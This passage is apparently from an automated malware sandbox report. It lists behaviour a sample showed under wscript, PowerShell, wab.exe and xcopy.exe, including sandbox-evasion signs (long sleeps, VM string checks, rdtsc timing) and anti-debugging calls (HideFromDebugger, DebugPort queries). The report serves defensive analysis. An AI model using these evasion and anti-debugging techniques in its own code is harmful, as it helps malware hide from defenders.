        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: C:\Windows\SysWOW64\xcopy.exe Code function: 22_2_0395D1C0 rdtsc 22_2_0395D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4992
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4925
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8086
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1703
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 966
        Source: C:\Windows\SysWOW64\xcopy.exe API coverage: 3.0 %
        Source: C:\Windows\System32\wscript.exe TID: 4256 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep count: 8086 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620 Thread sleep count: 1703 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1492 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6648 Thread sleep count: 966 > 30
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\xcopy.exe Last function: Thread delayed
        Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation
        Source: C:\Windows\SysWOW64\xcopy.exe Code function: 22_2_02F4B7A0 FindFirstFileW,FindNextFileW,FindClose, 22_2_02F4B7A0
        Source: wab.exe, 0000001B.00000002.3468143116.0000000000D68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0BC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.2183688264.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2225913246.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229406049.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183592062.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
        Source: wscript.exe, 00000000.00000003.2183808324.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2226248276.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229181627.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000008.00000002.3550837263.000001EF41514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

        Anti Debugging

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D1C0 rdtsc 22_2_0395D1C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0300D508 LdrInitializeThunk,LdrInitializeThunk,11_2_0300D508
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897F498 mov eax, dword ptr fs:[00000030h]17_3_0897F498
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_089788FA mov eax, dword ptr fs:[00000030h]17_3_089788FA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978A5A mov eax, dword ptr fs:[00000030h]17_3_08978A5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984462 mov eax, dword ptr fs:[00000030h]17_3_08984462
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984108 mov eax, dword ptr fs:[00000030h]17_3_08984108
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978700 mov eax, dword ptr fs:[00000030h]17_3_08978700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984302 mov eax, dword ptr fs:[00000030h]17_3_08984302
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984538 mov eax, dword ptr fs:[00000030h]17_3_08984538
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978B30 mov eax, dword ptr fs:[00000030h]17_3_08978B30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984578 mov eax, dword ptr fs:[00000030h]17_3_08984578
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978B70 mov eax, dword ptr fs:[00000030h]17_3_08978B70
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B539D mov eax, dword ptr fs:[00000030h]22_2_039B539D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0393739A mov eax, dword ptr fs:[00000030h]22_2_0393739A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0393739A mov eax, dword ptr fs:[00000030h]22_2_0393739A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390438F mov eax, dword ptr fs:[00000030h]22_2_0390438F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390438F mov eax, dword ptr fs:[00000030h]22_2_0390438F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039133A0 mov eax, dword ptr fs:[00000030h]22_2_039133A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039133A0 mov eax, dword ptr fs:[00000030h]22_2_039133A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039033A5 mov eax, dword ptr fs:[00000030h]22_2_039033A5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399B3D0 mov ecx, dword ptr fs:[00000030h]22_2_0399B3D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399C3CD mov eax, dword ptr fs:[00000030h]22_2_0399C3CD
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039663C0 mov eax, dword ptr fs:[00000030h]22_2_039663C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B53FC mov eax, dword ptr fs:[00000030h]22_2_039B53FC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039163FF mov eax, dword ptr fs:[00000030h]22_2_039163FF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F3E6 mov eax, dword ptr fs:[00000030h]22_2_0399F3E6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03900310 mov ecx, dword ptr fs:[00000030h]22_2_03900310
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC310 mov ecx, dword ptr fs:[00000030h]22_2_038DC310
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A132D mov eax, dword ptr fs:[00000030h]22_2_039A132D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A132D mov eax, dword ptr fs:[00000030h]22_2_039A132D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390F32A mov eax, dword ptr fs:[00000030h]22_2_0390F32A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D7330 mov eax, dword ptr fs:[00000030h]22_2_038D7330
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD34C mov eax, dword ptr fs:[00000030h]22_2_038DD34C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD34C mov eax, dword ptr fs:[00000030h]22_2_038DD34C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AA352 mov eax, dword ptr fs:[00000030h]22_2_039AA352
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov ecx, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5341 mov eax, dword ptr fs:[00000030h]22_2_039B5341
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9353 mov eax, dword ptr fs:[00000030h]22_2_038D9353
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9353 mov eax, dword ptr fs:[00000030h]22_2_038D9353
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398437C mov eax, dword ptr fs:[00000030h]22_2_0398437C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F367 mov eax, dword ptr fs:[00000030h]22_2_0399F367
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7370 mov eax, dword ptr fs:[00000030h]22_2_038E7370
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391329E mov eax, dword ptr fs:[00000030h]22_2_0391329E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03960283 mov eax, dword ptr fs:[00000030h]22_2_03960283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391E284 mov eax, dword ptr fs:[00000030h]22_2_0391E284
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5283 mov eax, dword ptr fs:[00000030h]22_2_039B5283
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov eax, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039692BC mov ecx, dword ptr fs:[00000030h]22_2_039692BC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F52A0 mov eax, dword ptr fs:[00000030h]22_2_038F52A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov eax, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039762A0 mov ecx, dword ptr fs:[00000030h]22_2_039762A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039772A0 mov eax, dword ptr fs:[00000030h]22_2_039772A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A92A6 mov eax, dword ptr fs:[00000030h]22_2_039A92A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390F2D0 mov eax, dword ptr fs:[00000030h]22_2_0390F2D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E92C5 mov eax, dword ptr fs:[00000030h]22_2_038E92C5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA2C3 mov eax, dword ptr fs:[00000030h]22_2_038EA2C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B2C0 mov eax, dword ptr fs:[00000030h]22_2_0390B2C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB2D3 mov eax, dword ptr fs:[00000030h]22_2_038DB2D3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F2F8 mov eax, dword ptr fs:[00000030h]22_2_0399F2F8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F02E1 mov eax, dword ptr fs:[00000030h]22_2_038F02E1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D92FF mov eax, dword ptr fs:[00000030h]22_2_038D92FF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039912ED mov eax, dword ptr fs:[00000030h]22_2_039912ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B52E2 mov eax, dword ptr fs:[00000030h]22_2_039B52E2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03917208 mov eax, dword ptr fs:[00000030h]22_2_03917208
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D823B mov eax, dword ptr fs:[00000030h]22_2_038D823B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5227 mov eax, dword ptr fs:[00000030h]22_2_039B5227
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9240 mov eax, dword ptr fs:[00000030h]22_2_038D9240
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399B256 mov eax, dword ptr fs:[00000030h]22_2_0399B256
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03968243 mov eax, dword ptr fs:[00000030h]22_2_03968243
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03968243 mov ecx, dword ptr fs:[00000030h]22_2_03968243
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E6259 mov eax, dword ptr fs:[00000030h]22_2_038E6259
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391724D mov eax, dword ptr fs:[00000030h]22_2_0391724D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA250 mov eax, dword ptr fs:[00000030h]22_2_038DA250
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03921270 mov eax, dword ptr fs:[00000030h]22_2_03921270
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03909274 mov eax, dword ptr fs:[00000030h]22_2_03909274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D826B mov eax, dword ptr fs:[00000030h]22_2_038D826B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990274 mov eax, dword ptr fs:[00000030h]22_2_03990274
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4260 mov eax, dword ptr fs:[00000030h]22_2_038E4260
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AD26B mov eax, dword ptr fs:[00000030h]22_2_039AD26B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03937190 mov eax, dword ptr fs:[00000030h]22_2_03937190
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396019F mov eax, dword ptr fs:[00000030h]22_2_0396019F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399C188 mov eax, dword ptr fs:[00000030h]22_2_0399C188
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03920185 mov eax, dword ptr fs:[00000030h]22_2_03920185
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA197 mov eax, dword ptr fs:[00000030h]22_2_038DA197
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039911A4 mov eax, dword ptr fs:[00000030h]22_2_039911A4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FB1B0 mov eax, dword ptr fs:[00000030h]22_2_038FB1B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391D1D0 mov eax, dword ptr fs:[00000030h]22_2_0391D1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391D1D0 mov ecx, dword ptr fs:[00000030h]22_2_0391D1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov eax, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E1D0 mov ecx, dword ptr fs:[00000030h]22_2_0395E1D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B51CB mov eax, dword ptr fs:[00000030h]22_2_039B51CB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A61C3 mov eax, dword ptr fs:[00000030h]22_2_039A61C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039871F9 mov esi, dword ptr fs:[00000030h]22_2_039871F9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E51ED mov eax, dword ptr fs:[00000030h]22_2_038E51ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039101F8 mov eax, dword ptr fs:[00000030h]22_2_039101F8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B61E5 mov eax, dword ptr fs:[00000030h]22_2_039B61E5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039051EF mov eax, dword ptr fs:[00000030h]22_2_039051EF
